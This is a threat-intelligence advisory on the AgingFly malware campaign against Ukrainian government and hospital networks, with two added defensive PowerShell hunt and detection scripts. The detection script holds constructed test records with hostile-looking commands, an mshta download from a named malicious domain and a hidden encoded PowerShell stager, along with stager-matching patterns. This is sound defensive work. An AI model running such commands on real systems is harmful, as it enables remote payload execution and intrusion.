AgingFly Malware: UAC-0247 Cyberattacks Target Ukrainian Government and Hospitals with Digitally Signed Malware

Executive Summary

A new and highly sophisticated malware strain, AgingFly, has been identified as the primary tool in a wave of cyberattacks targeting Ukrainian government agencies and hospitals. These attacks, attributed to the threat cluster UAC-0247, leverage advanced social engineering, multi-stage payload delivery, and custom malware to achieve persistent access, data exfiltration, and operational disruption. The campaign, active since at least March 2026, demonstrates a high degree of technical innovation, including the abuse of digitally signed software, advanced evasion techniques, and the integration of both espionage and financial gain objectives. The scope and impact of these attacks underscore the urgent need for robust detection, response, and mitigation strategies across all sectors, especially those involved in critical infrastructure and healthcare.

Threat Actor Profile

The threat actor behind the AgingFly campaign is tracked as UAC-0247 by CERT-UA. This cluster exhibits tactics, techniques, and procedures (TTPs) that overlap with known Russian advanced persistent threat (APT) groups, although no direct attribution to a specific APT (such as APT28) has been publicly confirmed. UAC-0247 is characterized by its focus on Ukrainian targets, particularly those in government, healthcare, and defense sectors. The group demonstrates a high level of operational security, adaptability, and technical sophistication, employing custom malware, living-off-the-land binaries (LOLBins), and digitally signed payloads to evade detection and maintain persistence. The motivation appears to be a blend of espionage, disruption of critical services, and secondary financial gain through cryptomining.

Technical Analysis of Malware/TTPs

The AgingFly malware is a custom-developed C# backdoor designed for modularity and stealth. Its infection chain typically begins with phishing emails crafted around humanitarian or wartime themes, exploiting the heightened sense of urgency and trust during conflict. These emails contain links to archives hosting malicious LNK shortcut files. Upon execution, these files leverage native Windows tools such as mshta.exe and PowerShell to download and execute further payloads, often presenting decoy documents to the user to mask malicious activity.

The malware employs a multi-stage loader architecture. Initial payloads are heavily obfuscated and compressed, with subsequent stages decrypted and executed in memory. Persistence is achieved through the creation of scheduled tasks (e.g., "WMILoad", "ClockRemoval") and WMI event subscriptions ("MbRemoval", "MbSetup"), as well as code injection into legitimate processes like RuntimeBroker.exe. The campaign also utilizes a PowerShell-based persistence tool, SILENTLOOP, which dynamically retrieves command-and-control (C2) addresses, sometimes sourcing them from Telegram channels to enhance resilience.

AgingFly's core capabilities include remote command execution, file exfiltration, screenshot capture, keylogging, and the dynamic retrieval and compilation of additional command logic from remote servers. This adaptability allows the malware to evolve its functionality post-infection, complicating detection and analysis. The campaign further employs credential theft tools such as CHROMELEVATOR (for browser credentials) and ZAPIXDESK (for WhatsApp data), as well as reconnaissance utilities like RUSTSCAN. Lateral movement is facilitated by tunneling tools including LIGOLO-NG and CHISEL.

A notable innovation in this campaign is the abuse of digitally signed software from Dragon Boss Solutions LLC. Malicious installers for products such as Chromstera Browser, Chromnius, WorldWideWeb, Web Genius, and Artificius Browser are used to deploy payloads with SYSTEM privileges, disable antivirus protections, and establish persistence. Additionally, a trojanized WireGuard VPN installer embeds the XMRIG cryptominer, indicating a secondary objective of resource hijacking for financial gain.

Antivirus evasion is achieved through PowerShell scripts that disable security products (including Malwarebytes, Kaspersky, McAfee, and ESET), modify the Windows hosts file to block AV vendor domains, and set Microsoft Defender exclusions for suspicious directories ("DGoogle", "EMicrosoft", "DDapps"). The campaign also leverages reverse shells such as RAVENSHELL for encrypted C2 communication.

Exploitation in the Wild

The AgingFly campaign has resulted in over 23,500 confirmed infections across 124 countries, with a concentration in Ukrainian government, healthcare, utilities, and educational networks. Notable incidents include successful compromises of hospital IT systems, local government agencies, and defense sector personnel, including the distribution of trojanized FPV drone operator software via Signal messenger. The attackers have demonstrated the ability to deploy payloads with SYSTEM privileges, disable endpoint protection, and maintain long-term access for both espionage and disruptive operations.

CERT-UA has documented multiple cases where digitally signed software was abused to bypass security controls, and where PowerShell scripts were used to systematically neutralize antivirus defenses. The use of legitimate digital signatures and living-off-the-land techniques has significantly hindered detection by traditional security solutions.

Victimology and Targeting

The primary targets of the AgingFly campaign are Ukrainian clinical hospitals, emergency services, municipal bodies, and defense sector entities. The attackers have also targeted military personnel, particularly those involved in drone operations, by distributing trojanized control software. While Ukraine remains the focal point, the campaign's infrastructure and payloads have been detected in networks spanning 124 countries, indicating a broad and opportunistic approach to victim selection.

The targeting strategy leverages social engineering themes relevant to the ongoing conflict, such as humanitarian aid and emergency response, to increase the likelihood of successful phishing. The use of digitally signed software and legitimate communication channels (e.g., Signal, Telegram) further enhances the credibility of malicious payloads and complicates attribution.

Mitigation and Countermeasures

Organizations are strongly advised to implement a multi-layered defense strategy to counter the AgingFly threat. Key recommendations include restricting the execution of LNK, HTA, and JavaScript files from email and untrusted sources, and limiting the use of native Windows tools such as mshta.exe and PowerShell through application whitelisting and endpoint protection policies. Continuous monitoring for the creation of suspicious scheduled tasks, WMI event subscriptions, and unauthorized PowerShell script execution is essential.

Security teams should audit endpoints for processes signed by Dragon Boss Solutions LLC, review hosts file entries for unauthorized AV domain blocks, and investigate any Microsoft Defender exclusions set for non-standard directories. It is critical to remove any suspicious exclusions and restore AV functionality immediately upon detection.
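The persistence and AV-neutralization artifacts named in the technical analysis (the scheduled tasks and WMI event subscriptions, the Defender exclusions and hosts file edits) and the endpoint audit steps in the two paragraphs above, gathered into one read-only hunt. This is an added PowerShell example and is not code from the original advisory, from Rescana, or from CERT-UA. The task, subscription and directory names and the signer name come from the advisory; the AV vendor keyword list used for the hosts file check and the LOLBin match on task actions are assumptions made for the check. It expects an elevated PowerShell session on the endpoint being audited.

```powershell
# Added example: read-only hunt for AgingFly persistence and AV-tampering artifacts.
# Run from an elevated PowerShell session on the endpoint being audited.
# Names below are taken from the advisory; the AV vendor keyword list is an assumption.

$TaskNames      = @('WMILoad', 'ClockRemoval')                   # scheduled task names in the advisory
$WmiSubNames    = @('MbRemoval', 'MbSetup')                       # WMI subscription names in the advisory
$SuspiciousDirs = @('DGoogle', 'EMicrosoft', 'DDapps')            # Defender exclusion directories in the advisory
$AvVendorHints  = @('malwarebytes', 'kaspersky', 'mcafee', 'eset') # assumed keyword list for hosts file entries
$SignerHint     = 'Dragon Boss Solutions'                         # signer named in the advisory

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Category, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Category = $Category; Detail = $Detail })
}

# 1. Scheduled tasks: match the known names, and flag any task whose action runs mshta or PowerShell.
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ; '
    if ($TaskNames -contains $task.TaskName) {
        Add-Finding 'ScheduledTask' "Known task name $($task.TaskPath)$($task.TaskName): $actions"
    } elseif ($actions -match 'mshta|powershell') {
        Add-Finding 'ScheduledTask' "LOLBin in task $($task.TaskPath)$($task.TaskName): $actions"
    }
}

# 2. Permanent WMI event subscriptions live in root\subscription as a filter plus a consumer.
$ns = 'root\subscription'
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue
$consumers = Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue
foreach ($f in $filters) {
    $tag = if ($WmiSubNames -contains $f.Name) { 'Known WMI filter' } else { 'WMI filter' }
    Add-Finding 'WmiSubscription' "$tag $($f.Name): $($f.Query)"
}
foreach ($c in $consumers) {
    Add-Finding 'WmiSubscription' "Command-line consumer $($c.Name): $($c.CommandLineTemplate)"
}

# 3. Microsoft Defender exclusions and the real-time protection flag.
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp) {
    foreach ($p in @($mp.ExclusionPath)) {
        if ($p -and ($SuspiciousDirs | Where-Object { $p -like "*$_*" })) {
            Add-Finding 'DefenderExclusion' "Exclusion path matches an advisory directory: $p"
        } elseif ($p) {
            Add-Finding 'DefenderExclusion' "Review exclusion path: $p"
        }
    }
    if ($mp.DisableRealtimeMonitoring) { Add-Finding 'DefenderTamper' 'Real-time monitoring is disabled' }
}

# 4. Hosts file entries that sinkhole AV vendor domains to localhost or 0.0.0.0.
$hostsPath = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
foreach ($line in Get-Content $hostsPath -ErrorAction SilentlyContinue) {
    $t = $line.Trim()
    if ($t -eq '' -or $t.StartsWith('#')) { continue }
    $parts = $t -split '\s+'
    if ($parts.Count -ge 2 -and $parts[0] -in @('127.0.0.1', '0.0.0.0', '::1')) {
        foreach ($name in $parts[1..($parts.Count - 1)]) {
            if ($AvVendorHints | Where-Object { $name -like "*$_*" }) {
                Add-Finding 'HostsFile' "AV vendor domain blocked: $t"
            }
        }
    }
}

# 5. Running processes whose image is Authenticode-signed by the signer named in the advisory.
foreach ($proc in Get-Process -ErrorAction SilentlyContinue | Where-Object Path) {
    $sig = Get-AuthenticodeSignature -FilePath $proc.Path -ErrorAction SilentlyContinue
    if ($sig -and $sig.SignerCertificate -and $sig.SignerCertificate.Subject -match $SignerHint) {
        Add-Finding 'SignedBinary' "PID $($proc.Id) $($proc.Path) signed by $($sig.SignerCertificate.Subject)"
    }
}

$findings | Format-Table -AutoSize -Wrap
```

The script only reports. Once a finding is confirmed, the matching remediation cmdlets are Remove-MpPreference -ExclusionPath for an exclusion, Unregister-ScheduledTask for a task, and Remove-CimInstance on the binding, consumer and filter for a WMI subscription; restoring real-time protection and re-checking the hosts file closes the loop the advisory asks for.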

Network monitoring should focus on detecting anomalous outbound connections to known malicious domains such as chromsterabrowser[.]com and worldwidewebframework3[.]com, as well as encrypted C2 traffic patterns associated with RAVENSHELL and similar tools. Incident response plans should be updated to include procedures for identifying and remediating infections involving digitally signed malware and living-off-the-land techniques.
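The LNK-to-mshta.exe/PowerShell execution chain from the technical analysis, together with the monitoring advice in the paragraph above (unauthorized LOLBin execution, outbound contact with the named domains), expressed as detection logic that is first exercised on constructed records and then, when available, on live Sysmon and DNS client data. This is an added PowerShell example, not code from the original advisory, from Rescana, or from CERT-UA. The two domains are the ones named in the text; the LOLBin watch list, the command-line patterns, the sample records and the Sysmon and DNS cache lookups are assumptions.

```powershell
# Added example: detection logic for the AgingFly execution chain (shortcut -> mshta.exe /
# PowerShell fetching a remote payload) plus a DNS cache check for the advisory's domains.

$KnownC2Domains = @('chromsterabrowser.com', 'worldwidewebframework3.com')  # named in the advisory
$LolBins        = @('mshta.exe', 'powershell.exe', 'pwsh.exe')              # assumed watch list

# Evaluates one process-creation record and returns a verdict with the reasons that fired.
function Test-ProcessCreation {
    param([string]$Image, [string]$CommandLine, [string]$ParentImage)
    $reasons = @()
    $imageName = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    if ($LolBins -contains $imageName) {
        if ($CommandLine -match 'https?://') { $reasons += 'LOLBin launched with a URL on its command line' }
        if ($CommandLine -match '-(enc|encodedcommand|e)\s|-w(indowstyle)?\s+hidden|-nop\b|downloadstring|iex\b|invoke-expression') {
            $reasons += 'Hidden-window, encoded or download switches typical of a stager'
        }
        if ($imageName -eq 'mshta.exe' -and $ParentImage -match '\\explorer\.exe$') {
            $reasons += 'mshta.exe spawned directly from the shell, consistent with a clicked shortcut'
        }
    }
    foreach ($d in $KnownC2Domains) {
        if ($CommandLine -match [regex]::Escape($d)) { $reasons += "References advisory domain $d" }
    }
    [pscustomobject]@{ Image = $Image; Suspicious = ($reasons.Count -gt 0); Reasons = $reasons }
}

# Pulls the three fields the test needs out of a Sysmon Event ID 1 (process create) record.
function ConvertFrom-SysmonProcessCreate {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Record)
    $xml  = [xml]$Record.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{ Image = $data['Image']; CommandLine = $data['CommandLine']; ParentImage = $data['ParentImage'] }
}

# Constructed sample records (not real telemetry) so the logic can be exercised offline.
$samples = @(
    @{ Image       = 'C:\Windows\System32\mshta.exe'
       CommandLine = 'mshta.exe http://worldwidewebframework3.com/stage.hta'   # constructed
       ParentImage = 'C:\Windows\explorer.exe' },
    @{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -nop -w hidden -enc AAAA'                 # constructed
       ParentImage = 'C:\Windows\System32\mshta.exe' },
    @{ Image       = 'C:\Windows\System32\notepad.exe'
       CommandLine = 'notepad.exe C:\Users\user\Desktop\notes.txt'             # constructed, benign
       ParentImage = 'C:\Windows\explorer.exe' }
)
foreach ($s in $samples) {
    $v = Test-ProcessCreation @s
    $label = if ($v.Suspicious) { 'SUSPICIOUS' } else { 'ok' }
    '{0,-11} {1} {2}' -f $label, $s.Image, ($v.Reasons -join '; ')
}

# Live hunt over the Sysmon operational log when it exists (needs Sysmon and an elevated session).
$live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
        -MaxEvents 5000 -ErrorAction SilentlyContinue
foreach ($r in $live) {
    $p = ConvertFrom-SysmonProcessCreate $r
    $v = Test-ProcessCreation -Image $p.Image -CommandLine $p.CommandLine -ParentImage $p.ParentImage
    if ($v.Suspicious) { "$($r.TimeCreated) $($p.Image): $($v.Reasons -join '; ')" }
}

# DNS client cache entries for the advisory domains (Get-DnsClientCache comes with the DnsClient module).
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $e = $_.Entry; $KnownC2Domains | Where-Object { $e -like "*$_" } } |
    Select-Object Entry, Data
```

The first two constructed records fire (a URL on the mshta command line and a hidden, encoded PowerShell child of mshta), the third does not. Sysmon command-line capture is the assumed telemetry source; the Security log's 4688 events carry the same fields only when command-line auditing is enabled, and the DNS cache check is a point-in-time view that should be backed by DNS server or proxy logs for the domains listed above.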

User awareness training should emphasize the risks associated with phishing emails, especially those themed around current events or humanitarian efforts. Regular security assessments and threat hunting activities are recommended to proactively identify and mitigate emerging threats.

References

The following sources provide additional technical details and context for the AgingFly campaign:

The Cyber Express: Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers (https://thecyberexpress.com/cyberattacks-on-hospitals-by-uac-0247-hackers/)

BleepingComputer: Signed software abused to deploy antivirus-killing scripts (https://www.bleepingcomputer.com/news/security/signed-software-abused-to-deploy-antivirus-killing-scripts/)

ScamLens: Signed software abused to deploy antivirus-killing scripts (https://scamlens.org/en/intelligence/news/0055b4d3-1c2b-4e64-9401-629461527b7c/signed-software-abused-to-deploy-antivirus-killing-scripts)

CERT-UA Advisory (UAC-0247) (https://cert.gov.ua/article/441)

MITRE ATT&CK Framework (https://attack.mitre.org/)

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help strengthen your organization's cyber resilience, please contact us at ops@rescana.com.